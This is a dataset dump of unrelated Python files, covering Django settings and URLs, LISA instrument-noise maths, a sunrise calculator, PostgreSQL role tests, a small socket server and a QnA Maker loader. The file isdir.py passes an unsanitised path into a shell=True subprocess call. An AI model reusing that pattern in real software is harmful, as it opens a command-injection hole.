SetEnv\n directive.\n\"\"\"\n\nimport os\n\n# Import base settings to make it easier to extend.\nfrom .base import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n (\"Jonathan Zaffke\", \"jonathan.zaffke@aacc.net\"),\n (\"Spencer Judd\", \"spencer.judd@aacc.net\"),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n\n","sub_path":"project_name/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"597129236","text":"import subprocess as sp\n\ndef get_dir_out(dire):\n out = \"\"\n backslash = \"\\\\\"\n process = sp.Popen(f'dir /ad /b \"{str(dire)}\" 1>nul 2>nul && (echo is a folder) || (echo is not a folder)', stdout=sp.PIPE, shell=True)#.replace(backslash, \"/\")\n searching = True\n while searching:\n o = process.stdout.readline()\n if o == b'':\n searching = False\n break\n else:\n out += o.decode(\"utf-8\")\n return out\n\ndef check_if_folder(path, iftrue = True):\n out = get_dir_out(path)\n #print (path)\n #print (repr(out))\n #print (out == \"is a folder\\r\\n\")\n if out == \"is a folder\\r\\n\":\n return iftrue\n else:\n return False","sub_path":"isdir.py","file_name":"isdir.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642341168","text":"'''\nCode modified from github.com/sharanbngr/blip\n'''\n\nfrom __future__ import division\nimport numpy as np\nimport types\n\ncspeed = 3e8\narmlength = 2.5e9\n\nfstar = cspeed / (2*np.pi*armlength)\n\ndef fundamental_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n '''\n Creates a frequency array of fundamentla noise estimates for lisa. Currently we consisder only contain only\n position and acceleration noise sources. The default values are specifications pulled from 2017 Lisa proposal\n noise estimations.\n\n Parameters\n -----------\n\n freqs : float\n A numpy array of frequencies\n\n Np (optional) : float\n Position noise value\n\n Na (optional) : float\n Acceleration noise level\n\n\n Returns\n ---------\n\n Sp, Sa : float\n Frequencies array for position and acceleration noises for each satellite\n '''\n\n Sp = Np*(1 + (2e-3/freqs)**4)\n Sa = Na*(1 + 16e-8/freqs**2)*(1 + (freqs/8e-3)**4)*(1.0/(2*np.pi*freqs)**4)\n\n return Sp, Sa\n\ndef aet_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n '''\n Calculates A, E, and T channel noise spectra for a stationary lisa. Following the defintions in\n Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308\n\n\n Parameters\n -----------\n\n freqs : float\n A numpy array of frequencies\n\n Np (optional) : float\n Position noise value\n\n Na (optional) : float\n Acceleration noise level\n\n\n Returns\n ---------\n\n SAA, SEE, STT : float\n Frequencies arrays with the noise PSD for the A, E and T TDI channels\n\n\n '''\n # Calculate f0\n f0 = freqs/(2*fstar)\n\n # Get Sp and Sa\n C_xyz = xyz_noise_spectrum(freqs, Np, Na)\n\n ## Upnack xyz matrix to make assembling the aet matrix easier\n CXX, CYY, CZZ = C_xyz[0, 0], C_xyz[1, 1], C_xyz[2, 2]\n CXY, CXZ, CYZ = C_xyz[0, 1], C_xyz[0, 2], C_xyz[1, 2]\n\n\n ## construct AET matrix elements\n CAA = (1/9) * (4*CXX + CYY + CZZ - 2*CXY - 2*np.conj(CXY) - 2*CXZ - 2*np.conj(CXZ) + \\\n CYZ + np.conj(CYZ))\n\n CEE = (1/3) * (CZZ + CYY - CYZ - np.conj(CYZ))\n\n CTT = (1/9) * (CXX + CYY + CZZ + CXY + np.conj(CXY) + CXZ + np.conj(CXZ) + CYZ + np.conj(CYZ))\n\n CAE = (1/(3*np.sqrt(3))) * (CYY - CZZ - CYZ + np.conj(CYZ) + 2*CXZ - 2*CXY)\n\n CAT = (1/9) * (2*CXX - CYY - CZZ + 2*CXY - np.conj(CXY) + 2*CXZ - np.conj(CXZ) - CYZ - np.conj(CYZ))\n\n CET = (1/(3*np.sqrt(3))) * (CZZ - CYY - CYZ + np.conj(CYZ) + np.conj(CXZ) - np.conj(CXY))\n\n C_aet = np.array([ [CAA, CAE, CAT] , \\\n [np.conj(CAE), CEE, CET], \\\n [np.conj(CAT), np.conj(CET), CTT] ])\n\n\n return C_aet\n\ndef xyz_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n '''\n Calculates X,Y,Z channel noise spectra for a stationary lisa. Following the defintions in\n Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308\n\n\n Parameters\n -----------\n\n freqs : float\n A numpy array of frequencies\n\n Np (optional) : float\n Position noise value\n\n Na (optional) : float\n Acceleration noise level\n\n\n Returns\n ---------\n\n SAA, SEE, STT : float\n Frequencies arrays with the noise PSD for the A, E and T TDI channels\n\n\n '''\n \n # Calculate f0\n f0 = freqs/(2*fstar)\n \n C_mich = mich_noise_spectrum(freqs, Np, Na)\n\n ## Noise spectra of the X, Y and Z channels\n #SX = 4*SM1* np.sin(2*f0)**2\n\n C_xyz = 4 * np.sin(2*f0)**2 * C_mich\n\n return C_xyz\n\ndef mich_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n '''\n Calculates michelson channel noise spectra for a stationary lisa. Following the defintions in\n Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308. We assume that\n there is no phase noise.\n\n\n Parameters\n -----------\n\n freqs : float\n A numpy array of frequencies\n\n Np (optional) : float\n Position noise value\n\n Na (optional) : float\n Acceleration noise level\n\n\n Returns\n ---------\n\n SAA, SEE, STT : float\n Frequencies arrays with the noise PSD for the A, E and T TDI channels\n\n\n '''\n \n # Calculate f0\n f0 = freqs/(2*fstar)\n \n # Get Sp and Sa\n Sp, Sa = fundamental_noise_spectrum(freqs, Np, Na)\n\n\n ## Noise spectra of the michelson channels\n S_auto = 4.0 * (2.0 * Sa * (1.0 + (np.cos(2*f0))**2) + Sp)\n S_cross = (-2 * Sp - 8 * Sa) * np.cos(2*f0)\n\n C_mich = np.array([[S_auto, S_cross, S_cross], [S_cross, S_auto, S_cross], [S_cross, S_cross, S_auto]])\n\n return C_mich\n","sub_path":"instrNoise.py","file_name":"instrNoise.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"186706288","text":"\"\"\"sunriseset.py: Algorithm to calculate sunrise and sunset.\"\"\"\n\nimport math\n\n\n__author__ = \"Raido Pahtma\"\n__license__ = \"MIT\"\n\n\nversion = \"0.1.0\"\n\n\nZENITH_OFFICIAL = 90+50/60.0\nZENITH_CIVIL = 96\nZENITH_NAUTICAL = 102\nZENITH_ASTRONOMICAL = 108\n\n\ndef sun_time(zenith, rising, year, month, day, longitude, latitude, local=0):\n \"\"\"\n Sunrise/Sunset Algorithm\n\n Source:\n Almanac for Computers, 1990\n published by Nautical Almanac Office\n United States Naval Observatory\n Washington, DC 20392\n\n Inputs:\n day, month, year: date of sunrise/sunset\n latitude, longitude: location for sunrise/sunset\n zenith: Sun's zenith for sunrise/sunset\n offical = 90 degrees 50'\n civil = 96 degrees\n nautical = 102 degrees\n astronomical = 108 degrees\n\n NOTE: longitude is positive for East and negative for West\n NOTE: the algorithm assumes the use of a calculator with the\n trig functions in \"degree\" (rather than \"radian\") mode. Most\n programming languages assume radian arguments, requiring back\n and forth convertions. The factor is 180/pi. So, for instance,\n the equation RA = atan(0.91764 * tan(L)) would be coded as RA\n = (180/pi)*atan(0.91764 * tan((pi/180)*L)) to give a degree\n answer with a degree input for L.\n\n Output:\n Hours from 00:00:00 as a float.\n \"\"\"\n\n \"\"\"\n 1. first calculate the day of the year\n N1 = floor(275 * month / 9)\n N2 = floor((month + 9) / 12)\n N3 = (1 + floor((year - 4 * floor(year / 4) + 2) / 3))\n N = N1 - (N2 * N3) + day - 30\n \"\"\"\n N1 = math.floor(275 * month / 9)\n N2 = math.floor((month + 9) / 12)\n N3 = (1 + math.floor((year - 4 * math.floor(year / 4) + 2) / 3))\n N = N1 - (N2 * N3) + day - 30\n\n \"\"\"\n 2. convert the longitude to hour value and calculate an approximate time\n\n lngHour = longitude / 15\n\n if rising time is desired:\n t = N + ((6 - lngHour) / 24)\n if setting time is desired:\n t = N + ((18 - lngHour) / 24)\n \"\"\"\n lngh = longitude / 15\n\n if rising:\n t = N + ((6 - lngh) / 24)\n else:\n t = N + ((18 - lngh) / 24)\n\n \"\"\"\n 3. calculate the Sun's mean anomaly\n\n M = (0.9856 * t) - 3.289\n \"\"\"\n M = (0.9856 * t) - 3.289\n\n \"\"\"\n 4. calculate the Sun's true longitude\n\n L = M + (1.916 * sin(M)) + (0.020 * sin(2 * M)) + 282.634\n NOTE: L potentially needs to be adjusted into the range [0,360) by adding/subtracting 360\n \"\"\"\n L = M + (1.916 * math.sin((math.pi/180)*M)) + (0.020 * math.sin(2*(math.pi/180)*M)) + 282.634\n\n while L < 0:\n L += 360\n while L > 360:\n L -= 360\n\n \"\"\"\n 5a. calculate the Sun's right ascension\n\n RA = atan(0.91764 * tan(L))\n NOTE: RA potentially needs to be adjusted into the range [0,360) by adding/subtracting 360\n \"\"\"\n RA = (180/math.pi)*math.atan(0.91764 * math.tan((math.pi/180)*L))\n\n while RA < 0:\n RA += 360\n while RA > 360:\n RA -= 360\n\n \"\"\"\n 5b. right ascension value needs to be in the same quadrant as L\n\n Lquadrant = (floor( L/90)) * 90\n RAquadrant = (floor(RA/90)) * 90\n RA = RA + (Lquadrant - RAquadrant)\n \"\"\"\n L_quad = (math.floor(L/90)) * 90\n RA_quad = (math.floor(RA/90)) * 90\n RA = RA + (L_quad - RA_quad)\n\n \"\"\"\n 5c. right ascension value needs to be converted into hours\n\n RA = RA / 15\n \"\"\"\n RA = RA / 15\n\n \"\"\"\n 6. calculate the Sun's declination\n\n sinDec = 0.39782 * sin(L)\n cosDec = cos(asin(sinDec))\n \"\"\"\n sin_dec = 0.39782 * math.sin((math.pi/180)*L)\n cos_dec = math.cos(math.asin(sin_dec))\n\n \"\"\"\n 7a. calculate the Sun's local hour angle\n\n cosH = (cos(zenith) - (sinDec * sin(latitude))) / (cosDec * cos(latitude))\n\n if (cosH > 1)\n the sun never rises on this location (on the specified date)\n if (cosH < -1)\n the sun never sets on this location (on the specified date)\n \"\"\"\n cos_h = (math.cos((math.pi/180)*zenith) - (sin_dec * math.sin((math.pi/180)*latitude))) / (cos_dec * math.cos((math.pi/180)*latitude))\n if cos_h > 1:\n if rising is True:\n #print \"no sunrise\"\n return -1\n else:\n #print \"no sunrise, but setting requested!\"\n #cos_h = cos_h - 1 # This does not seem to fix it\n return -1\n\n if cos_h < -1:\n if rising is False:\n #print \"no sunset\"\n return -1\n else:\n #print \"no sunset, but rising requested!\"\n #cos_h = cos_h + 1 # This does not seem to fix it\n return -1\n\n \"\"\"\n 7b. finish calculating H and convert into hours\n\n if if rising time is desired:\n H = 360 - acos(cosH)\n if setting time is desired:\n H = acos(cosH)\n\n H = H / 15\n \"\"\"\n if rising:\n H = 360 - (180/math.pi)*math.acos(cos_h)\n else:\n H = (180/math.pi)*math.acos(cos_h)\n\n H = H / 15\n\n \"\"\"\n 8. calculate local mean time of rising/setting\n\n T = H + RA - (0.06571 * t) - 6.622\n \"\"\"\n T = H + RA - (0.06571 * t) - 6.622\n\n \"\"\"\n 9. adjust back to UTC\n\n UT = T - lngHour\n NOTE: UT potentially needs to be adjusted into the range [0,24) by adding/subtracting 24\n \"\"\"\n UT = T - lngh\n\n \"\"\"\n 10. convert UT value to local time zone of latitude/longitude\n\n localT = UT + localOffset\n \"\"\"\n local_T = UT + local\n while local_T < 0:\n local_T += 24\n while local_T > 24:\n local_T -= 24\n\n return local_T\n\n\ndef convert_time(ut):\n \"\"\"\n Convert the sun_time float value to a string.\n \"\"\"\n if ut < 0:\n return \"XX:XX:XX\"\n hrs = int(ut)\n mns = int((ut - hrs)*60)\n secs = int((ut - hrs - mns/60.0)*3600)\n\n return \"%02u:%02u:%02u\" % (hrs, mns, secs)\n","sub_path":"sunriseset/sunriseset.py","file_name":"sunriseset.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"296064739","text":"import os\nimport pytest\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef get_facts(host):\n return host.ansible(\"setup\")[\"ansible_facts\"]\n\n\ndef get_psql_version():\n return os.getenv('PSQL_VERSION', '9.6')\n\n\ndef get_config_path(host, type):\n facts = get_facts(host)\n\n psql = get_psql_version()\n\n if facts['ansible_os_family'] == 'Debian':\n if type == 'hba':\n return '/etc/postgresql/' + psql + '/main/pg_hba.conf'\n else:\n return '/etc/postgresql/' + psql + '/main/postgresql.conf'\n\n if type == 'hba':\n return '/var/lib/pgsql/' + psql + '/data/pg_hba.conf'\n\n return '/var/lib/pgsql/' + psql + '/data/postgresql.conf'\n\n\ndef test_hosts_file(host):\n f = host.file('/etc/hosts')\n\n assert f.exists\n assert f.user == 'root'\n assert f.group == 'root'\n\n\n@pytest.mark.parametrize(\"config_type\", [\n (\"hba\"),\n (\"conf\"),\n])\ndef test_configuration_files(host, config_type):\n config_path = get_config_path(host, config_type)\n\n f = host.file(config_path)\n assert f.exists\n assert f.user == 'postgres'\n assert f.group == 'postgres'\n\n\ndef test_hba(host):\n config_path = get_config_path(host, 'hba')\n\n hba = host.file(config_path)\n assert hba.contains('0.0.0.0/0')\n assert hba.contains('::/0')\n\n\ndef test_service(host):\n facts = get_facts(host)\n\n if facts['ansible_os_family'] == 'Debian':\n assert host.service('postgresql').is_running\n else:\n assert host.service('postgresql-' + get_psql_version()).is_running\n","sub_path":"roles/mrlesmithjr.postgresql/molecule/shared/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37596139","text":"import socket\nimport os\nimport time\nfrom _thread import *\nimport threading\n\nprint(\"Starting Server...\")\nServerSocket = socket.socket()\nhost = \"127.0.0.1\"\nport = int(input(\"Enter Server Port: \"))\nthread_count = 0\ntry:\n ServerSocket.bind((host, port))\nexcept socket.error as e:\n print(f\"Error: {e}\")\n print(\"Closing Server...\")\n exit\n\nprint(\"Waiting for a Connection..\")\nServerSocket.listen(10)\n\nres = \".\"\n\n\ndef listener():\n client, address = ServerSocket.accept()\n print(\"Master Connected\")\n print(\"Connected to: \" + address[0] + \":\" + str(address[1]))\n client.send(str.encode(\"Welcome to the Server\\n\"))\n try:\n while True:\n global res\n data = client.recv(2048)\n msg = data.decode()\n if not data:\n print(f\"Master shutting down.\")\n break\n if msg != \".\":\n print(f\"Received from master: {msg}\")\n client.sendall(res.encode())\n res = \".\"\n except Exception:\n client.close()\n\n\nthreads = []\n\n\ndef file_writer():\n while True:\n user_input = input()\n global res\n res = user_input\n if res == \"exit\":\n print(\"Closing Server...\")\n exit()\n\n\nt1 = threading.Thread(target=listener)\nt2 = threading.Thread(target=file_writer)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nServerSocket.close()\n","sub_path":"sem-5/cn-lab/lab-3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54029833","text":"import os\nimport time\nimport json\nfrom azure.cognitiveservices.knowledge.qnamaker import QnAMakerClient\nfrom azure.cognitiveservices.knowledge.qnamaker.models import QnADTO, MetadataDTO, CreateKbDTO, OperationStateType, UpdateKbOperationDTO, UpdateKbOperationDTOAdd\nfrom msrest.authentication import CognitiveServicesCredentials\n\n# Check credentials\nkey_var_name = 'QNAMAKER_KEY'\nif not key_var_name in os.environ:\n raise Exception('Please set/export the environment variable: {}'.format(key_var_name))\nsubscription_key = os.environ[key_var_name]\n\nhost_var_name = 'QNAMAKER_HOST'\nif not host_var_name in os.environ:\n raise Exception('Please set/export the environment variable: {}'.format(host_var_name))\nhost = os.environ[host_var_name]\n\n# Define utility function for status monitoring\n# Helper functions\ndef _monitor_operation(client, operation):\n\n for i in range(1000):\n if operation.operation_state in [OperationStateType.not_started, OperationStateType.running]:\n print(\"Waiting for operation: {} to complete.\".format(operation.operation_id))\n time.sleep(5)\n operation = client.operations.get_details(operation_id=operation.operation_id)\n else:\n break\n if operation.operation_state != OperationStateType.succeeded:\n raise Exception(\"Operation {} failed to complete.\".format(operation.operation_id))\n return operation\n\n \n\nclient = QnAMakerClient(endpoint=host, credentials=CognitiveServicesCredentials(subscription_key))\n\n\n#Load Chatty data\nwith open('faq_all.json') as f:\n data = json.load(f)\n\nnew_data = []\nfor item in data:\n if not isinstance(item['question'],float):\n new_data.append(item)\n\n#intent-descrption dict\nwith open('intent_description.json') as g:\n desc = json.load(g)\n intdict=dict()\nfor item in desc:\n intdict[item[0]]=item[1]\n\n\ndef create_kb(client):\n\n\n qna = []\n record = new_data[0]\n qna.append(\n QnADTO(\n answer = intdict[record['intent']],\n questions = [record['question']],\n metadata = [MetadataDTO(name='Intent',value=record['intent'])]\n #MetadataDTO(name='AdminTag',value=record['admin_tag'])]\n )\n )\n\n\n create_kb_dto = CreateKbDTO(\n name = \"SKT Chatty FAQ\",\n qna_list = qna,\n urls=None #urls\n )\n create_op = client.knowledgebase.create(create_kb_payload=create_kb_dto)\n \n create_op = _monitor_operation(client=client, operation=create_op)\n\n return create_op.resource_location.replace(\"/knowledgebases/\", \"\")\n\n# # create kb\nkb_id = create_kb(client)\nprint(kb_id)\n\n\ndef publish_kb(client, kb_id):\n client.knowledgebase.publish(kb_id=kb_id)\n\n\n\n# Publish the KB\nprint(\"Publishing KB...\")\npublish_kb (client=client, kb_id=kb_id)\nprint(\"KB Published.\")\nprint()\n\n\ndef update_kb(client, kb_id,record):\n\n qna = []\n \n qna.append(\n QnADTO(\n answer = intdict[record['intent']],\n questions = [record['question']],\n metadata = [MetadataDTO(name='Intent',value=record['intent'])]\n #MetadataDTO(name='AdminTag',value=record['admin_tag'])]\n )\n )\n\n update_kb_operation_dto = UpdateKbOperationDTO(\n add=UpdateKbOperationDTOAdd(\n qna_list=qna\n )\n )\n update_op = client.knowledgebase.update(kb_id=kb_id, update_kb=update_kb_operation_dto)\n _monitor_operation(client=client, operation=update_op)\n\n\n# Update a KB\nfor idx, record in enumerate(new_data[1:]):\n print(\"Updating KB...\")\n update_kb (client=client, kb_id=kb_id,record=record)\n print(\"KB Updated.\")\nprint()\n\n","sub_path":"kb_chatty.py","file_name":"kb_chatty.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"404051268","text":"#! /usr/bin/env python\n# -*- coding: latin-1 -*-\n\n## LOGGERS\n# Cette classe definit le logger de base\n\n#Import des classes du projet\nimport logger_config as loggerConfig\nimport Init.init_config as initConfig\n#Import des classes exterieures au projet\nimport logging\n\n\ndef init_loggers():\n # Crée le logger\n logger = logging.getLogger(loggerConfig.LOGGER_BASE_NAME)\n logger.setLevel (logging.DEBUG)\n logger.propagate = False # Ne remonte pas au root, certains modules pourrissent le logger global\n\n # Définit le niveau d'output du logger dans le fichier LOG_FILE\n fh = logging.FileHandler(initConfig.RUN_TIME_FOLDER + loggerConfig.LOG_FILE, mode = 'a')\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter(fmt = '%(asctime)s - %(name)s - %(levelname)s | %(message)s', datefmt = '%d/%m %H:%M:%S')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Définit le niveau d'output du logger dans la console\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter2 = logging.Formatter(fmt = '%(name)s - %(levelname)s | %(message)s')\n ch.setFormatter(formatter2)\n logger.addHandler(ch)\n\ndef getLogger (subLogger):\n return logging.getLogger ('{}.{}'.format(loggerConfig.LOGGER_BASE_NAME, subLogger))\n\n#Lance les loggers\ninit_loggers()\n","sub_path":"crawling/Logger/init_logger.py","file_name":"init_logger.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"529214800","text":"# https://www.jiuzhang.com/solutions/peak-index-in-a-mountain-array#tag-highlight-lang-python\nclass Solution:\n def peakIndexInMountainArray(self, A: List[int]) -> int:\n return self.binary_search_peak(A)\n # return self.binary_search(A)\n # return self.ternary_search(A)\n\n def ternary_search(self, nums):\n # Works with duplicates, i.e. [1,1,1,1,2,1,1,1,1]\n start, end = 0, len(nums) - 1\n while start + 3 < end:\n mid1 = start + (end - start) // 3\n mid2 = end - (end - start) // 3\n if nums[mid1] < nums[mid2]:\n start = mid1\n elif nums[mid1] > nums[mid2]:\n end = mid2\n elif nums[mid1] == nums[mid2]:\n start, end = mid1, mid2\n\n peak = nums[start]\n peak_id = start\n for idx in range(start, end + 1):\n if nums[idx] > peak:\n peak = nums[idx]\n peak_id = idx\n return peak_id\n\n def binary_search_peak(self, nums):\n # Doesn't work with duplicates, i.e. [1,1,1,1,2,1,1,1,1]\n # Since peak is garunteed without at edges, we just have to find maximum.\n start, end = 0, len(nums) - 1\n\n while start + 1 < end:\n mid = (start + end) // 2\n if nums[mid - 1] < nums[mid]:\n start = mid\n else:\n end = mid\n\n if nums[start] > nums[end]:\n return start\n return end\n\n def binary_search(self, nums):\n start, end = 0, len(nums) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n\n if self._is_peak(nums, mid):\n return mid\n\n if self._is_pos_slope(nums, mid):\n start = mid\n else:\n end = mid\n\n if nums[start] > nums[end]:\n return start\n return end\n\n def _is_peak(self, nums, idx):\n if idx == 0 or idx == len(nums) - 1:\n return False\n return nums[idx - 1] < nums[idx] and nums[idx] > nums[idx + 1]\n\n def _is_pos_slope(self, nums, idx):\n return nums[idx - 1] < nums[idx] and nums[idx] < nums[idx + 1]\n","sub_path":"leetcode/lc852_Peak_Index_in_a_Mountain_Array.py","file_name":"lc852_Peak_Index_in_a_Mountain_Array.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"352606357","text":"__author__ = 'dpak'\nfrom django.conf.urls import include, url\nfrom django.contrib import admin, auth\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.home, name='oqa'),\n url(r'^get_all_applications/$', views.get_all_applications, name='get_all_applications'),\n url(r'^question/$', views.question, name='question'),\n url(r'^edit_question/$', views.edit_question, name='edit_question'),\n url(r'^delete_question/$', views.delete_question, name='delete_question'),\n url(r'^answer/$', views.answer, name='answer'),\n url(r'^new_question/$', views.new_question, name='new_question'),\n url(r'^get_new_question/$', views.get_new_question, name='get_new_question'),\n url(r'^do_edit_question/$', views.do_edit_question, name='do_edit_question'),\n url(r'^get_edited_question/$', views.get_edited_question, name='get_edited_question'),\n url(r'^get_new_answer/$', views.get_new_answer, name='get_new_answer'),\n url(r'^get_answer_form/$', views.get_answer_form, name='get_answer_form'),\n url(r'^get_answer_actions/$', views.get_answer_actions, name='get_answer_actions'),\n url(r'^delete_answer/$', views.delete_answer, name='delete_answer'),\n url(r'^get_edit_answer_information/$', views.get_edit_answer_information, name='get_edit_answer_information'),\n url(r'^social_share_answer/$', views.social_share_answer, name='social_share_answer'),\n url(r'^edit_answer/$', views.edit_answer, name='edit_answer'),\n url(r'^get_edited_answer/$', views.get_edited_answer, name='get_edited_answer'),\n url(r'^answer_reporting/$', views.answer_reporting, name='answer_reporting'),\n url(r'^do_answer_report/$', views.do_answer_report, name='do_answer_report'),\n url(r'^platforms/$', views.platforms, name='platforms'),\n url(r'^fave_platform/$', views.fave_platform, name='fave_platform'),\n url(r'^favorites/$', views.favorites, name='favorites'),\n url(r'^remove_faved_platform/$', views.remove_faved_platform, name='remove_faved_platform'),\n url(r'^search_platform/$', views.search_platform, name='search_platform'),\n url(r'^faved_platform_search/$', views.faved_platform_search, name='faved_platform_search'),\n url(r'^communities/$', views.communities, name='communities'),\n url(r'^join_community/$', views.join_community, name='join_community'),\n url(r'^search_community/$', views.search_community, name='search_community'),\n url(r'^new_community_form/$', views.new_community_form, name='new_community_form'),\n url(r'^register_community/$', views.register_community, name='register_community'),\n url(r'^my_communities/$', views.my_communities, name='my_communities'),\n url(r'^search_my_communities/$', views.search_my_communities, name='search_my_communities'),\n url(r'^search_admin_communities/$', views.search_admin_communities, name='search_admin_communities'),\n url(r'^manage_community/$', views.manage_community, name='manage_community'),\n url(r'^community_members/$', views.community_members, name='community_members'),\n url(r'^community_member_actions/$', views.community_member_actions, name='community_member_actions'),\n url(r'^community_qas/$', views.community_qas, name='community_qas'),\n url(r'^search_qa/$', views.search_qa, name='search_qa'),\n url(r'^delete_community_member/$', views.delete_community_member, name='delete_community_member'),\n url(r'^block_community_member/$', views.block_community_member, name='block_community_member'),\n url(r'^unblock_community_member/$', views.unblock_community_member, name='unblock_community_member'),\n url(r'^get_community_member_actions/$', views.get_community_member_actions, name='get_community_member_actions'),\n url(r'^search_community_members/$', views.search_community_members, name='search_community_members'),\n url(r'^community_member_permissions/$', views.community_member_permissions, name='community_member_permissions'),\n url(r'^set_community_member_permissions/$', views.set_community_member_permissions, name='set_community_member_permissions'),\n url(r'^vote_question/$', views.vote_question, name='vote_question'),\n url(r'^get_vote_question_content/$', views.get_vote_question_content, name='get_vote_question_content'),\n url(r'^unvote_question/$', views.unvote_question, name='unvote_question'),\n url(r'^vote_answer/$', views.vote_answer, name='vote_answer'),\n url(r'^unvote_answer/$', views.unvote_answer, name='unvote_answer'),\n url(r'^get_vote_answer_content/$', views.get_vote_answer_content, name='get_vote_answer_content'),\n url(r'^add_question_favourite/$', views.add_question_favourite, name='add_question_favourite'),\n url(r'^remove_question_favourite/$', views.remove_question_favourite, name='remove_question_favourite'),\n url(r'^get_anchor_action_menu/$', views.get_anchor_action_menu, name='get_anchor_action_menu'),\n url(r'^anchor_me/$', views.anchor_me, name='anchor_me'),\n url(r'^un_anchor_me/$', views.un_anchor_me, name='un_anchor_me'),\n url(r'^favorites_questions/$', views.favorites_questions, name='favorites_questions'),\n url(r'^get_unfollowed_communities/$', views.get_unfollowed_communities, name='get_unfollowed_communities'),\n]","sub_path":"oqa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399878690","text":"#Peak_Mean Detection (Resample possible)\ndef PeakM(XT, XT_, Location_Name, Debug='False'):\n test = sum(XT).reset_index()\n test.columns = ['Dates','Tweets']\n test.index = pd.to_datetime(test['Dates'], format=\"%d-%m-%Y\")\n del test['Dates']\n test = test.resample('2D',how='sum')\n test['Tweets'] = test['Tweets'].fillna(0)\n \n meanT = np.mean(test['Tweets'])\n \n test.loc[:,'Peak_Value'] = 0\n for x in range(0, len(test['Tweets'])):\n if test['Tweets'][x] > meanT:\n test.loc[:,'Peak_Value'][x] = (test['Tweets'][x]/meanT)\n else:\n test.loc[:,'Peak_Value'][x] = 0 \n \n test.to_csv('E:/Konstantin/School - Nijmegen/Master Thesis/CSV/Peak/'+XT_+Location_Name+'_PeakM'+'.csv')\n","sub_path":"Peak_Mean_Detection.py","file_name":"Peak_Mean_Detection.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4312564","text":"import wx\n\nclass EditMenu(wx.Menu):\n def __init__(self):\n wx.Menu.__init__(self)\n \n self.undoMenuItem = wx.MenuItem(self, wx.ID_UNDO, \"&Undo\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.undoMenuItem)\n \n self.redoMenuItem = wx.MenuItem(self, wx.ID_REDO, \"&Redo\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.redoMenuItem)\n \n self.AppendSeparator()\n \n self.cutMenuItem = wx.MenuItem(self, wx.ID_CUT, \"Cu&t\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.cutMenuItem)\n \n self.copyMenuItem = wx.MenuItem(self, wx.ID_COPY, \"&Copy\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.copyMenuItem)\n \n self.pasteMenuItem = wx.MenuItem(self, wx.ID_PASTE, \"&Paste\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.pasteMenuItem)\n \n self.deleteMenuItem = wx.MenuItem(self, wx.ID_DELETE, \"&Delete\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.deleteMenuItem)\n \n self.AppendSeparator()\n \n self.selectAllMenuItem = wx.MenuItem(self, wx.ID_SELECTALL, \"Select &All\", wx.EmptyString, wx.ITEM_NORMAL)\n self.AppendItem(self.selectAllMenuItem)\n","sub_path":"PythonEditor/src/ui/menu/edit_menu.py","file_name":"edit_menu.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253937614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom mendeley_client import MendeleyClient\n\n# Renomeie o arquivo para mendeley.py após adicionar as chaves abaixo!\nmendeley = MendeleyClient('', '')\n\ntry:\n mendeley.load_keys()\nexcept IOError:\n mendeley.get_required_keys()\n 